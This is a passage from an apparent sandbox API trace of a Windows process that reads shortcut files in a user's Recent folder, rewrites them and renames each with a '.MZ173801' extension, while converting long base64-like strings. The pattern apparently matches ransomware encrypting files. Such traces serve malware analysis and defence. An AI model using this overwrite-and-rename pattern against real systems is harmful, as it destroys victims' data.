lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0113.125] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0113.126] GetCurrentThreadId () returned 0x1358 [0113.126] GetCurrentThreadId () returned 0x1358 [0113.126] GetCurrentThreadId () returned 0x1358 [0113.126] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\zvmVe w.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\zvmve w.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0113.126] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0113.126] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0113.126] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x3cc [0113.126] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0113.126] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x3cc, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x3cc, lpOverlapped=0x0) returned 1 [0113.127] CloseHandle (hObject=0x3f4) returned 1 [0113.127] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\zvmVe w.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\zvmve w.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0113.128] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x3cc, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x3cc, lpOverlapped=0x0) returned 1 [0113.129] CloseHandle (hObject=0x3f4) returned 1 [0113.129] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\zvmVe w.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\zvmve w.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\zvmVe w.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\zvmve w.lnk.mz173801")) returned 1 [0113.130] GetCurrentThreadId () returned 0x1358 [0113.130] GetCurrentThreadId () returned 0x1358 [0113.130] GetCurrentThreadId () returned 0x1358 [0113.130] GetCurrentThreadId () returned 0x1358 [0113.130] GetCurrentThreadId () returned 0x1358 [0113.130] GetCurrentThreadId () returned 0x1358 [0113.130] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b9654e6, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x8b9654e6, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x8b9654e6, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x424, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="zY_vL.lnk", cAlternateFileName="")) returned 1 [0113.130] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.130] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.130] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\zY_vL.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\zy_vl.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b9654e6, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x8b9654e6, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x8b9654e6, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x424)) returned 1 [0113.131] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0113.131] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0113.131] GetCurrentThreadId () returned 0x1358 [0113.131] GetCurrentThreadId () returned 0x1358 [0113.131] GetCurrentThreadId () returned 0x1358 [0113.132] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0113.132] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0113.132] GetCurrentThreadId () returned 0x1358 [0113.132] GetCurrentThreadId () returned 0x1358 [0113.132] GetCurrentThreadId () returned 0x1358 [0113.133] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\zY_vL.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\zy_vl.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0113.133] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0113.133] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0113.133] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x424 [0113.133] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0113.133] ReadFile (in: hFile=0x3f4, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x424, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x424, lpOverlapped=0x0) returned 1 [0113.134] CloseHandle (hObject=0x3f4) returned 1 [0113.134] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\zY_vL.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\zy_vl.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0113.135] WriteFile (in: hFile=0x3f4, lpBuffer=0x2433b60*, nNumberOfBytesToWrite=0x424, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2433b60*, lpNumberOfBytesWritten=0x19f9bc*=0x424, lpOverlapped=0x0) returned 1 [0113.135] CloseHandle (hObject=0x3f4) returned 1 [0113.136] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\zY_vL.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\zy_vl.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\zY_vL.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\zy_vl.lnk.mz173801")) returned 1 [0113.137] GetCurrentThreadId () returned 0x1358 [0113.137] GetCurrentThreadId () returned 0x1358 [0113.137] GetCurrentThreadId () returned 0x1358 [0113.137] GetCurrentThreadId () returned 0x1358 [0113.137] GetCurrentThreadId () returned 0x1358 [0113.137] GetCurrentThreadId () returned 0x1358 [0113.137] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81498029, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x81498029, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x81498029, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x348, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="_5 PohF4cOl3RenyNkzK.lnk", cAlternateFileName="_5POHF~1.LNK")) returned 1 [0113.137] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.137] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.137] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\_5 PohF4cOl3RenyNkzK.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\_5 pohf4col3renynkzk.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81498029, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x81498029, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x81498029, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x348)) returned 1 [0113.138] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0113.138] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 